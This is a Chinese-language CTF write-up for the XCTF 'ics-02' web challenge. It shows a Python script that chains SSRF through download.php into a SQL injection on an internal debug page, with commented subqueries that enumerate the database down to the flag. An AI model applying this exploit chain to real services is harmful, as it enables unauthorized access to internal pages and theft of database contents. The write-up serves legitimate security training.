[wp] 攻防世界 ics-02

原創

2020-06-19 12:28

進去掃目錄發現/secret

無法直接進入secret_debug.php 顯示ip不對
點paper會向download.php傳參,可以下載一個ssrf內容的pdf,
於是想到利用ssrf來訪問secret_debug.php

發現參數s,fuzz一下,發現s=3時會有如下返回

經測試在此頁面發現sql注入漏洞,進行注入得到flag,腳本如下:

import requests
import random
import urllib

url = 'http://111.198.29.45:52536/download.php'

# subquery = "database()"
# ssrfw
# subquery = "select table_name from information_schema.tables where table_schema='ssrfw' LIMIT 1"
# cetcYssrf
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1"
# secretname -> flag
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1, 1"
# value -> flag{cpg9ssnu_OOOOe333eetc_2018}
subquery = "select value from cetcYssrf LIMIT 1"

id = random.randint(1, 10000000)

d = ('http://127.0.0.1/secret/secret_debug.php?' +
        urllib.parse.urlencode({
            "s": "3",
            "txtfirst_name": "L','1',("+subquery+"),'1'/*",
            "txtmiddle_name": "m",
            "txtLast_name": "y",
            "txtname_suffix": "Esq.",
            "txtdob": "*/,'01/10/2019",
            "txtdl_nmbr": id,
            "txtRetypeDL": id
            }) + "&")


r = requests.get(url, params={"dl": d})
print(r.text)

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

相關文章

網絡空間安全基礎第5天

DHCP部署與安全 DHCP的作用 Dynamic Host Configure Protocol 自動分配IP地址 DHCP相關概念地址池/作用域:(地址池裏包含：IP,子網掩碼，網關，DNS，租期），將所有地址放到地址池裏。

2020-07-07 21:21:53

網絡空間安全基礎第2天

1.局域網 127.0.0.1 迴環地址，代表自己網關一個網絡的出口，Gateway=GW,一般網關是在路由器上。路由器：可用連接內外網的設備，網關架設在路由器的一個接口上一次簡單的局域網實驗將xp和win2003的

2020-07-07 21:21:53

網絡空間安全基礎第1天

1. 虛擬機的兩種架構

2020-07-07 21:21:53

SSH安全審計Tool - ssh-audit

SSH安全審計Tool - ssh-audit InstallAuditReference ssh-audit 工具支持SSH1和SSH2協議，通過掃描服務器上SSH服務，可以收集SSH連接各個階段所使用的算法，並對這些算法進行

2020-06-23 04:23:37

DVWA初學

DVWA初學筆記 DVWA的介紹 DVWA是用PHP和MySQL編寫的用於常規web漏洞教學和檢測web脆弱性測試程序，它包含SQL注入、XSS、CSRF等常見的一些安全漏洞。我們可以在本機或者靶機甚至服務器搭建DVWA環境，供我

2020-06-22 02:33:35

OSI7層模型網絡排錯和網絡安全

OSI7層模型和網絡排錯 OSI7層模型和網絡安全 5g基站算是那一層的設備？基站和手機之間，實現了無線信道，因此屬於物理層。除了技術本身存在的漏洞，更容易出問題的環節往往在於和人相關的環節，防禦內鬼非常重

2020-06-21 12:03:12

[wp] 攻防世界 CISCN-2018-Final blgdel

訪問robots.txt,發現config.txt <?php class master { private $path; private $name; function __construct() { }

2020-06-19 14:42:59

[wp] 攻防世界 Web_php_wrong_nginx_config

在robots.txt下發現hack.php,訪問抓包修改cookie 出現頁面,抓包觀察,發現在點擊管理中心時url出現?file=index&ext=php 嘗試進行文件讀取,發現…/被過濾,根據題目提示構造url 獲取c

2020-06-19 13:31:28

ThinkPHP5.x rec 漏洞分析與復現

https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 先貼個漏洞預警,這裏

2020-06-19 13:31:28

[wp] SCTF 2018 Zhuanxv

掃目錄發現/list,點進去發現要登陸,抓包發現一個請求爲看到JSESSIONID,得知是java web,所以想辦法讀取配置文件web.xml 發現用了struts過濾器,嘗試讀struts.xml 發現一個看起來和登

2020-06-19 13:31:28

[wp] 攻防世界 Web_php_include

<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=

2020-06-19 13:31:28

[信安數基] 二次剩餘

膜重複平方計算+歐拉判別條件 #include<iostream> #include<cmath> using namespace std; int square(int x) { return x * x; }

2020-06-19 12:28:33

[wp] HITB CTF 2017 website

拿到題目看了源代碼後只發現了一個action.php線索仍然不足,於是開始掃目錄,發現一個叫test.php的頁面發現一串base64字符,然後對action.php頁面進行抓包,修改username 返回了admin的c

2020-06-19 12:28:32

[wp] 攻防世界 baby_web

emmm,這就是個簽到題這裏提一下兩種做法,第一種是直接抓包第二種是

2020-06-19 12:28:32

[wp] 攻防世界 isc-07

首先看源代碼裏的這一段: if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { includ

2020-06-19 12:28:32

24小時熱門文章

最新文章

最新評論文章